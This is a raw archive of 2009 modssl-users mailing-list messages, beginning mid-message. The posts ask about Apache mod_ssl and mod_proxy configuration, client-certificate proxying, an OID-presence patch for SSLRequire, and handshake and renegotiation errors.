> the proxy (as opposed to the hidden application) server but the SSL serve=
r
> would not fall for it.
>=20
> Assuming that my initial approach is not possible, I would like to use an
> apache http server as my proxy-server/SSL-client.  My goal is to keep thi=
s
> apache server thin (i.e., only configuration, no extra java code).  Is th=
ere a
> way to configure mod_proxy and (specially) mod_ssl to do this very thing?
>=20
> Here=B9s my proxy.conf template:
>=20
> ProxyRequests On
> 
>    Order deny,allow
>     Deny from all
>     Allow from internal_ip_address
> 
>=20
> Cheers,
>=20
> John.


--B_3323348685_2903263
Content-type: text/html;
	charset="ISO-8859-1"
Content-transfer-encoding: quoted-printable



Client SSL Proxy Configuration


Hello,


<=
SPAN STYLE=3D'font-size:11pt'>

I consume web services from an outside-of-my-firewall SSL server that requi=
res clients to be SSL-authenticated (clients must pre-register).  My ap=
plication server resides inside of my firewall.  I would like to access=
 the aforementioned web services through a proxy in order to not expose my i=
nternal server hostname to the outside world.  I have tried to setup my=
 SSL connection (e.g., using my client certificate, trusting the web service=
 provider) from within my internal application server w/ the client certific=
ate generated for the proxy (as opposed to the hidden application) server bu=
t the SSL server would not fall for it.  



Assuming that my initial approach is not possible, I would like to use an a=
pache http server as my proxy-server/SSL-client.  My goal is to keep th=
is apache server thin (i.e., only configuration, no extra java code).  =
Is there a way to configure mod_proxy and (specially) mod_ssl to do this ver=
y thing?



Here’s my proxy.conf template:



ProxyRequests On

<Proxy *>

   Order deny,allow

    Deny from all

    Allow from internal_ip_address

</Proxy>



Cheers,



John.







--B_3323348685_2903263--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  6 06:53:06 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 623E514D9EA; Wed,  6 May 2009 06:53:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-ew0-f178.google.com (mail-ew0-f178.google.com [209.85.219.178])
	by master.modssl.org (Postfix) with ESMTP id 6E24314D869
	for ; Wed,  6 May 2009 06:52:41 +0200 (CEST)
Received: by ewy26 with SMTP id 26so6276906ewy.1
        for ; Tue, 05 May 2009 21:51:14 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:content-type;
        bh=Q3Cu3C26BsSZnpVXKk29swW0RyNPLC0rwsb5en/2N1k=;
        b=sZn8yPzWstHxBKwKmj9JNBPoZvKU1O9h3Izibres/qHvQk/M1N4bNSMY6cKbenYIme
         QL8xbv2L4xMlRmZZVdvHjgYkWPTQMq8qh7dJAGlYQTtCixwsBsDSfSYi45MuCDTxNRvV
         wO3JWjFxKvz/gnGIZsEQDQc0X1SLFFB1uh/m0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject
         :content-type;
        b=tgpcGKhV6xxfjJxGjJafk0lX5iLKh6TTDK2nwIBKMVkA6UmDrIXshwkOKXpBgDxmwA
         7m51v+HiCjcHtL1vjoMXwxyrwlMVLKFVcgp/0Z9Gnd0eciy4Vsn7qOTE4MQvX7c81Jz7
         pKMhT1yEB6KLfTRKnE9Rq+wsdyyIu+WLIRlR8=
Received: by 10.210.136.10 with SMTP id j10mr1090604ebd.25.1241585474815;
        Tue, 05 May 2009 21:51:14 -0700 (PDT)
Received: from ?192.168.63.12? ([82.200.162.93])
        by mx.google.com with ESMTPS id 7sm2981467eyb.25.2009.05.05.21.51.12
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Tue, 05 May 2009 21:51:14 -0700 (PDT)
Message-ID: <4A0116EA.6000605@gmail.com>
Date: Wed, 06 May 2009 10:49:46 +0600
From: Zhumabekov Yerden 
User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Restricting access by arbitrary certificate extension
Content-Type: multipart/mixed;
 boundary="------------000808010101020202040508"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zhumabekov Yerden 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------000808010101020202040508
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit

            mod_ssl can perform client authentication on certificate in 
Apache and client authorization on certain certificate extensions. We 
are setting up CA here and we want to restrict access to certain website 
by checking the presence of certain certificate extension using its OID. 
The syntax which mod_ssl is forcing us to use is the following:
 
            
            SSLRequire “some string†in OID(“1.2.3.4…..â€)
            
 
As you can see, we need to match this string exactly in extension’s 
value. We can encounter problem with this, because this extension may 
not be listed in openssl list of valid extensions 
(crypto/objects/objects.h). As I learned the mod_ssl and openssl code, 
mod_ssl would not be able to match the string because the object of this 
OID does not have valid NID in openssl. OpenSSL seems incapable of 
determining the type of arbitrary extension we want to use as 
restricting factor. Hence, mod_ssl can not even extract its value from 
certificate.
            Well, I poked around the problem for some time and found no 
other way than to patch mod_ssl by adding one new function in 
ssl_expr_eval.c which does almost the same thing as ssl_extlist_by_oid() 
and ssl_expr_eval_oid() but does not intend to extract the value of 
certificate extension. I also added some change to ssl_expr_eval_comp(), 
so if you supply the zero-length word in SSLRequire, it uses my new 
function instead of ssl_expr_eval_oid(). So, the new syntax is like this:
 
            
            SSLRequire Ҡin OID(“1.2.3.4…..â€)
            
 
            If you are aware of more attractive and “right†way to make 
it, please acknowledge. My patch for apache-2.2.11 is attached.

-- 
Zhumabekov Yerden

--------------000808010101020202040508
Content-Type: application/gzip;
 name="apache_oid_presence.patch.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
 filename="apache_oid_presence.patch.gz"

H4sICEofAEoAA2FwYWNoZV9vaWRfcHJlc2VuY2UucGF0Y2gArVXbbtpAEH0uXzF9M9gG2wmp
kpY0vVCpFQIppFLfLMceh03MLl0vgSjNv3fGNnc3bdVaGMzsXM6cObtORJqCO4zmGtrtzsSY
WeIG7aDt+22VJZ2pSuYZ5p08z/gOcTnTId5HWTuG9nOrDdd1/zbji8DzXrl+4Ppd8I/PjoMz
ivFWF9jeiec1bNt+vjJnOXW9Ln3APzk78s+63kGWiwtwj06cE7Dp+xVcXDSgAbmJjIjh/Wg0
ANjJGsZqOrM0fp9jbkKNMbSctQe0mq/XwfEkIsNu8ELp5Nlge7syr8QTjO9CJZJwpjFHGeNu
vHYgVjI3VTlyzI3eQlHXAjk9m4RR/iZtXXPpXMZhKjLc77B03ooW0sA+KMofT2cZLq3SfSuM
R+QHPk3H9oPA8b1iSvuXSMFSM+j1QM3CkUgGIjf9DKcoTRMeD/35qvo9gh7UDcoBPGLYDbcu
OFVzmRxEFuQ6sPDp5mC7LpSxUsMZSmvhN+FlD7xmvec/FsIsxz9LXCe0KjPUk9dpwdUENcJC
ZBlcI0gFU6X5N8EclAQzQchoDCRyVfyhzPPMgMghmpuJ0oL1cI/Q6tSXuNYY3ZUCCLpd3qRB
99Q57u4IQKOZawnMSaR19ECAnwjzf9pKDfuxJJBFGxNhhgjzHLitGC/SV3314NO7wbhfrXzr
eqfQWuZkHn4dDCrru/HQD0fvv/Q/XBU1KvN4PPigpLxkIASWgEiKmz6wke5U3FjaPWczxkYo
yQMvI2kMRot7ETGL9kpdJXreDVwbfvyAddYDk3tODyv7lg4rYlc9rct9RIN6KiQWM6VKsECI
aPCZUndC3pCu9A4YRkPdUNehWZpAXd9W+Bzwm811ZXjc1O5fXoZxhhGJXWulrW2B7+Fi09MW
PEZiCmFG8gFwaVDmxFhOEywAx6jN2118xZBoBOENmnCGqEN2EqmII4PWNk0buETgBpK1UgYP
vchCdcPCSMnLIG+nwd80MVB0lql71BDR5to04fCzjmJTtEL7TGhMeAb5uiNm37pllb6GW3hT
ipYebXsHQIG0/+2qPxx/Hg2hRXn38BNy0vlGaSu6eI50Vlvk4p7TMEmRDkOo6XLVa7U9ri6/
9g9OqmqTr61Pe2wUkFKNyExWfr+SR8VqWZBsnAT2D4L/8CZsrN4ofCrQUfATCWkNIj0JAAA=
--------------000808010101020202040508--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 28 17:44:47 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B04914DA36; Thu, 28 May 2009 17:44:47 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx2.redhat.com (mx2.redhat.com [66.187.237.31])
	by master.modssl.org (Postfix) with ESMTP id 725BD14D838
	for ; Thu, 28 May 2009 17:44:22 +0200 (CEST)
Received: from int-mx2.corp.redhat.com (int-mx2.corp.redhat.com [172.16.27.26])
	by mx2.redhat.com (8.13.8/8.13.8) with ESMTP id n4SFgOvv004906;
	Thu, 28 May 2009 11:42:24 -0400
Received: from ns3.rdu.redhat.com (ns3.rdu.redhat.com [10.11.255.199])
	by int-mx2.corp.redhat.com (8.13.1/8.13.1) with ESMTP id n4SFgNfR015147;
	Thu, 28 May 2009 11:42:23 -0400
Received: from turnip.manyfish.co.uk (vpn-13-178.rdu.redhat.com [10.11.13.178])
	by ns3.rdu.redhat.com (8.13.8/8.13.8) with ESMTP id n4SFgLuT025928;
	Thu, 28 May 2009 11:42:22 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.69)
	(envelope-from )
	id 1M9hkL-00049C-Cj; Thu, 28 May 2009 16:42:21 +0100
Date: Thu, 28 May 2009 16:42:21 +0100
From: Joe Orton 
To: Zhumabekov Yerden 
Cc: dev@httpd.apache.org, modssl-users@modssl.org
Subject: Re: Restricting access by arbitrary certificate extension
Message-ID: <20090528154221.GD13483@redhat.com>
Mail-Followup-To: Zhumabekov Yerden ,
	dev@httpd.apache.org, modssl-users@modssl.org
References: <4A0116EA.6000605@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <4A0116EA.6000605@gmail.com>
User-Agent: Mutt/1.5.18 (2008-05-17)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.27.26
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Zhumabekov - discussion of mod_ssl for httpd 2.x takes place on the 
deveopment list for Apache httpd, CC'ed.  (I'm quoting the full mail 
inline for reference of dev@ readers)

On Wed, May 06, 2009 at 10:49:46AM +0600, Zhumabekov Yerden wrote:
>            mod_ssl can perform client authentication on certificate in  
> Apache and client authorization on certain certificate extensions. We  
> are setting up CA here and we want to restrict access to certain website  
> by checking the presence of certain certificate extension using its OID.  
> The syntax which mod_ssl is forcing us to use is the following:
>
>            
>            SSLRequire “some string†in OID(“1.2.3.4…..â€)
>            
>
> As you can see, we need to match this string exactly in extension’s  
> value. We can encounter problem with this, because this extension may  
> not be listed in openssl list of valid extensions  
> (crypto/objects/objects.h). As I learned the mod_ssl and openssl code,  
> mod_ssl would not be able to match the string because the object of this  
> OID does not have valid NID in openssl. OpenSSL seems incapable of  
> determining the type of arbitrary extension we want to use as  
> restricting factor. Hence, mod_ssl can not even extract its value from  
> certificate.
>            Well, I poked around the problem for some time and found no  
> other way than to patch mod_ssl by adding one new function in  
> ssl_expr_eval.c which does almost the same thing as ssl_extlist_by_oid()  
> and ssl_expr_eval_oid() but does not intend to extract the value of  
> certificate extension. I also added some change to ssl_expr_eval_comp(),  
> so if you supply the zero-length word in SSLRequire, it uses my new  
> function instead of ssl_expr_eval_oid(). So, the new syntax is like this:
>
>            
>            SSLRequire Ҡin OID(“1.2.3.4…..â€)
>            
>
>            If you are aware of more attractive and “right†way to make  
> it, please acknowledge. My patch for apache-2.2.11 is attached.

I'd rather see a different syntax used for the new semantics, such as:

   SSLRequire has_oid("1.2.3.4")

though I'm not sure whether the SSLRequire parser can cope with that.

Regards, Joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun  2 10:23:14 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D905E14DA68; Tue,  2 Jun 2009 10:23:14 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.ivorde.ro (ivorde.ro [82.137.33.36])
	by master.modssl.org (Postfix) with ESMTP id 9F90F14D839
	for ; Tue,  2 Jun 2009 10:23:13 +0200 (CEST)
Received: (qmail 21474 invoked by uid 0); 2 Jun 2009 11:21:46 +0300
Received: from www.ivorde.ro (andrei.manescu@ivorde.ro@www.ivorde.ro) by mail.ivorde.ro (envelope-from , uid 1001) with qmail-scanner-2.05st 
 (clamdscan: 0.94.2/8872. spamassassin: 3.2.5. perlscan: 2.05st.  
 Clear:RC:1(192.168.1.11):. 
 Processed in 0.070895 secs); 02 Jun 2009 08:21:46 -0000
Received: from www.ivorde.ro (HELO mail.ivorde.ro) (andrei.manescu@ivorde.ro@192.168.1.11)
  by mail.ivorde.ro with SMTP; 2 Jun 2009 11:21:46 +0300
Received: from 62.168.56.1
        (SquirrelMail authenticated user andrei.manescu@ivorde.ro)
        by mail.ivorde.ro with HTTP;
        Tue, 2 Jun 2009 11:21:46 +0300 (EEST)
Message-ID: <40123.62.168.56.1.1243930906.squirrel@mail.ivorde.ro>
Date: Tue, 2 Jun 2009 11:21:46 +0300 (EEST)
Subject: ssl_error_handshake_unexpected_alert
From: "Andrei Manescu - Ivorde" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.8
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrei Manescu - Ivorde" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm using apache 1.3.41 with latest mod_ssl. In my https I'm using squrrelmail
and, after sending an email (pressing the SEND button) I get a firefox error:

SSL peer was not expecting a handshake message it received.

(Error codei: ssl_error_handshake_unexpected_alert)


Has anyone had this error before ?

-- 
Kind regards,
Andrei Manescu



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 11 17:25:56 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7966614D87D; Thu, 11 Jun 2009 17:25:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (mail.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 3B88914D838
	for ; Thu, 11 Jun 2009 17:25:32 +0200 (CEST)
Received: (qmail 32150 invoked by uid 0); 11 Jun 2009 15:24:04 -0000
Received: from 85.183.155.93 by www173.gmx.net with HTTP;
 Thu, 11 Jun 2009 17:24:01 +0200 (CEST)
Content-Type: text/plain; charset="iso-8859-1"
Date: Thu, 11 Jun 2009 17:24:01 +0200
From: pillii@gmx.de
Message-ID: <20090611152401.226470@gmx.net>
MIME-Version: 1.0
Subject: problem with client certificates
To: modssl-users@modssl.org
X-Authenticated: #2566029
X-Flags: 0001
X-Mailer: WWW-Mail 6100 (Global Message Exchange)
X-Priority: 3
X-Provags-ID: V01U2FsdGVkX1802L9kZF80FPJ55Z+Ozq4dIb6+/JlA0acUfeQBq/
 NFn5Y3y0rDOlVZtF1kZw8xbzqqfWsA/wJH4w== 
Content-Transfer-Encoding: 8bit
X-GMX-UID: qRMCfh0RX1V6K7lKS2Fyc/p/SDc4NIw6
X-FuHaFi: 0.57
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pillii@gmx.de
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

im using client certificates to authenticate myself with FakeBasicAuth to my webserver. This works quite fine.
But there is one case where it doesnt work. When i open my website and then wait a little time (1-2 minutes) and then do a POST to upload a file i get an "[error] Re-negotiation handshake failed: Not accepted by client!?" error.

Heres the log:

192.168.88.3 - /C=.../ST=.../O=.../CN=.../emailAddress=... [11/Jun/2009:16:34:29 +0200] "GET /images/smilies/thumbsdown.gif HTTP/1.1" 200 1130
[Thu Jun 11 16:36:25 2009] [error] Re-negotiation handshake failed: Not accepted by client!?
192.168.88.3 - - [11/Jun/2009:16:36:25 +0200] "POST /upload2.php?filetoupload=lalala HTTP/1.1" 103 -

Whats the problem here? I thought that maybe this is some sort of timeout problem, but the only one i found was SSLSessionCacheTimeout and that is set like this:
SSLSessionCache        shmht:/var/lib/apache2/ssl_scache(512000)
SSLSessionCacheTimeout  600
So its more than 2 minutes.

Also i forgot to mention that when the POST failed and i then load my page again (sending the POST doesnt work here) and then quickly POST again then it works.


Thank you for your help.
Regards,
Pepe
-- 
GMX FreeDSL Komplettanschluss mit DSL 6.000 Flatrate und Telefonanschluss
für nur 17,95 Euro/mtl.!* http://portal.gmx.net/de/go/dsl02
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 12 22:43:23 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4081F14D9F5; Fri, 12 Jun 2009 22:43:23 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail-ew0-f226.google.com (mail-ew0-f226.google.com [209.85.219.226])
	by master.modssl.org (Postfix) with ESMTP id 0373B14D839
	for ; Fri, 12 Jun 2009 22:42:58 +0200 (CEST)
Received: by ewy26 with SMTP id 26so3239394ewy.1
        for ; Fri, 12 Jun 2009 13:41:31 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:from:to
         :content-type:content-transfer-encoding:mime-version:subject:date
         :x-mailer;
        bh=r/+dm82VyXQr8jGn7W4gmkdPFSnWFY/v9ZyGm3RSvz4=;
        b=LSNJAbJvJK3oc2JTks1Eh4OQ9nsDhZjdY2i7cmU8W1AvXyvEYHKrOombhTFbhY3jmg
         kFI63eLK6IjCL8C4PCXOYzjVvtDdha/hM1lk/pQJVvgmvHEy5bjFnmS5+ndNS13/ABdX
         g/k5LDElrwOHyVOVYApHL/xVpQCCmYcFxDw+w=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:from:to:content-type:content-transfer-encoding
         :mime-version:subject:date:x-mailer;
        b=P6qk46xCbmC7ex2NqvFhcDgvvBROkIJ+h2+TTqx+GljUodfutS/VxxSBQzhgNOFg88
         w/tQEuNcAeE6D3TZ4hTQbgcAR5mRdh3O3aIZX3l6Y7ed15JtsIS3zUI8l9tFkwS6IM3r
         vZD90V14OLd5LK9Pl0Aprf57RxNb2ivj4TcII=
Received: by 10.210.115.15 with SMTP id n15mr489539ebc.20.1244839291458;
        Fri, 12 Jun 2009 13:41:31 -0700 (PDT)
Received: from ?192.168.1.100? (lns-bzn-48f-81-56-218-36.adsl.proxad.net [81.56.218.36])
        by mx.google.com with ESMTPS id 24sm389857eyx.13.2009.06.12.13.41.30
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 12 Jun 2009 13:41:31 -0700 (PDT)
Message-Id: <9EFFB419-C3E6-411D-A35D-49A5C46170C5@gmail.com>
From: Nicolas Cros 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v935.3)
Subject: How clients certificates are choosen ?
Date: Fri, 12 Jun 2009 22:41:28 +0200
X-Mailer: Apple Mail (2.935.3)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nicolas Cros 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello !

I want to setup a proxy, allowing my internal hosts to connect on  
external https servers (which forces client authentication by using a  
certificate).

Excerpt of my .conf :

# TEST
#ProxyPass               /proxy/TEST/    https://laposte.net
#ProxyPassReverse        /proxy/TEST/    https://laposte.net

SSLEngine on
SSLProxyEngine on
SSLProxyMachineCertificateFile /etc/httpd/conf/ssl/SSLproxy.pem
SSLCertificateFile /etc/httpd/conf/ssl/my.cer
SSLCertificateKeyFile /etc/httpd/conf/ssl/my.key
SSLCACertificateFile  /etc/httpd/conf/ssl/ca-bundle.crt


I try to connect on 2 servers with similar configuration (same CA  
used, both requiring client auth, ... ):

One connection is successfull, as i can saw in my debug httpd log file :

[debug] ssl_engine_kernel.c(1499): Proxy client certificate callback:  
(myproxy:443) found acceptable cert, sending /C=XX/ST=CITY/L=Port/ 
O=ORGANIZATION/OU=31/CN=myCN/emailAddress=myemail


The other one not :

	[debug] ssl_engine_kernel.c(1571): Proxy client certificate callback:  
(myproxy:443) no client certificate found!?

I wonder myself how clients certificates are choosen ?
Any thoughts ?

Thanks in advance


--
Nicolas Cros
Connaissez vous la maison du cordonnier ?
Elle se trouve ici : http://barsa.free.fr

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 17 14:58:28 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B455914DA3E; Fri, 17 Jul 2009 14:58:28 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from engine29-1277-2.icritical.com (engine29-1277-2.icritical.com [212.57.248.116])
	by master.modssl.org (Postfix) with SMTP id 624A514D838
	for ; Fri, 17 Jul 2009 14:58:04 +0200 (CEST)
Received: (qmail 24935 invoked from network); 17 Jul 2009 12:56:31 -0000
Received: from localhost (127.0.0.1)
  by engine29-1277-2.icritical.com with SMTP; 17 Jul 2009 12:56:31 -0000
Received: from engine29-1277-2.icritical.com ([127.0.0.1])
 by localhost (engine29-1277-2.icritical.com [127.0.0.1]) (amavisd-new, port 10024)
 with SMTP id 24003-08 for ;
 Fri, 17 Jul 2009 13:56:23 +0100 (BST)
Received: (qmail 24892 invoked by uid 599); 17 Jul 2009 12:56:22 -0000
Received: from unknown (HELO exchangegw1.rl.ac.uk) (130.246.135.148)
    by engine29-1277-2.icritical.com (qpsmtpd/0.28) with ESMTP; Fri, 17 Jul 2009 13:56:22 +0100
Received: from exchange11.fed.cclrc.ac.uk ([172.16.133.11]) by exchangegw1.rl.ac.uk with Microsoft SMTPSVC(6.0.3790.3959);
	 Fri, 17 Jul 2009 13:56:24 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01CA06DD.FCE1EBC2"
Subject: SSL connection between Apache and Tomcat failing
Date: Fri, 17 Jul 2009 13:56:23 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL connection between Apache and Tomcat failing
Thread-Index: AcoG3fzzy0RmuBrlSqyhE/FzWzgagw==
From: "Emsley, I (Iain)" 
To: 
X-OriginalArrivalTime: 17 Jul 2009 12:56:24.0069 (UTC) FILETIME=[FD4CD350:01CA06DD]
X-Virus-Scanned: by iCritical at engine29-1277-2.icritical.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emsley, I (Iain)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01CA06DD.FCE1EBC2
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I've got a website which uses Apache 2.2 as the front end with Tomcat
5.5.23 as the backend and am using mod_ssl and mod_proxy to link to the
two together in Windows server 2003. Normally there isn't an issue with
two servers serving the website but recently (and mainly with , it
appears, mobile browsers), I'm getting the following errors:

i Jul 17 09:52:29 2009] [debug] ssl_engine_kernel.c(1760): OpenSSL:
Loop: SSLv3 read finished A

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_kernel.c(1756): OpenSSL:
Handshake: done

[Fri Jul 17 09:52:29 2009] [info] Connection: Client IP: 130.246.76.83,
Protocol: TLSv1, Cipher: DHE-RSA-AES256-SHA (256/256 bits)

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1817): OpenSSL: read
5/5 bytes from BIO#7d0ad8 [mem: 4a3aaa8] (BIO dump follows)

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1750):
+-----------------------------------------------------------------------
--+

Dump details                                   .....            |

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1795):
+-----------------------------------------------------------------------
--+

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1817): OpenSSL: read
992/992 bytes from BIO#7d0ad8 [mem: 4a3aaad] (BIO dump follows)

[Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1750):
+-----------------------------------------------------------------------
--+

Dump details

 [Fri Jul 17 09:52:29 2009] [debug] ssl_engine_io.c(1795):
+-----------------------------------------------------------------------
--+

[Fri Jul 17 09:52:29 2009] [info] Initial (No.1) HTTPS request received
for child 245 (server dev.jiscmail.ac.uk:443)

[Fri Jul 17 09:52:35 2009] [debug] ssl_engine_io.c(1828): OpenSSL: I/O
error, 5 bytes expected to read on BIO#73e708 [mem: 4a169e0]

[Fri Jul 17 09:52:35 2009] [info] [client 130.246.76.83] (OS 10060)A
connection attempt failed because the connected party did not properly
respond after a period of time, or established connection failed because
connected host has failed to respond.  : SSL input filter read failed.

[Fri Jul 17 09:52:35 2009] [debug] ssl_engine_kernel.c(1770): OpenSSL:
Write: SSL negotiation finished successfully

=20

I'd be grateful for any pointers in getting to the root of this issue
(or ruling out mod_ssl issues).=20

=20

Thanks,=20

=20

Iain


-- =0AScanned by iCritical.=0A

------_=_NextPart_001_01CA06DD.FCE1EBC2
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















I’ve got a website which uses Apache 2.2 as =
the front
end with Tomcat 5.5.23 as the backend and am using mod_ssl and mod_proxy =
to
link to the two together in Windows server 2003. Normally there =
isn’t an
issue with two servers serving the website but recently (and mainly with =
, it appears,
mobile browsers), I’m getting the following errors:



i Jul 17 09:52:29 2009] [debug] =
ssl_engine_kernel.c(1760):
OpenSSL: Loop: SSLv3 read finished A



[Fri Jul 17 09:52:29 2009] [debug]
ssl_engine_kernel.c(1756): OpenSSL: Handshake: done



[Fri Jul 17 09:52:29 2009] [info] Connection: =
Client IP:
130.246.76.83, Protocol: TLSv1, Cipher: DHE-RSA-AES256-SHA (256/256 =
bits)



[Fri Jul 17 09:52:29 2009] [debug] =
ssl_engine_io.c(1817):
OpenSSL: read 5/5 bytes from BIO#7d0ad8 [mem: 4a3aaa8] (BIO dump =
follows)



[Fri Jul 17 09:52:29 2009] [debug] =
ssl_engine_io.c(1750):
+------------------------------------------------------------------------=
-+



Dump =
details           =
            &=
nbsp;          
.....            =
|



[Fri Jul 17 09:52:29 2009] [debug] =
ssl_engine_io.c(1795):
+------------------------------------------------------------------------=
-+



[Fri Jul 17 09:52:29 2009] [debug] =
ssl_engine_io.c(1817):
OpenSSL: read 992/992 bytes from BIO#7d0ad8 [mem: 4a3aaad] (BIO dump =
follows)



[Fri Jul 17 09:52:29 2009] [debug] =
ssl_engine_io.c(1750):
+------------------------------------------------------------------------=
-+



Dump details



 [Fri Jul 17 09:52:29 2009] [debug]
ssl_engine_io.c(1795):
+------------------------------------------------------------------------=
-+



[Fri Jul 17 09:52:29 2009] [info] Initial (No.1) =
HTTPS
request received for child 245 (server =
dev.jiscmail.ac.uk:443)



[Fri Jul 17 09:52:35 2009] [debug] =
ssl_engine_io.c(1828):
OpenSSL: I/O error, 5 bytes expected to read on BIO#73e708 [mem: =
4a169e0]



[Fri Jul 17 09:52:35 2009] [info] [client =
130.246.76.83] (OS
10060)A connection attempt failed because the connected party did not =
properly
respond after a period of time, or established connection failed because
connected host has failed to respond.  : SSL input filter read =
failed.



[Fri Jul 17 09:52:35 2009] [debug]
ssl_engine_kernel.c(1770): OpenSSL: Write: SSL negotiation finished
successfully



 



I’d be grateful for any pointers in getting =
to the
root of this issue (or ruling out mod_ssl issues). 



 



Thanks, 



 



Iain







=

-- =0A
Scanned by iCritical.=0A


=




------_=_NextPart_001_01CA06DD.FCE1EBC2--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
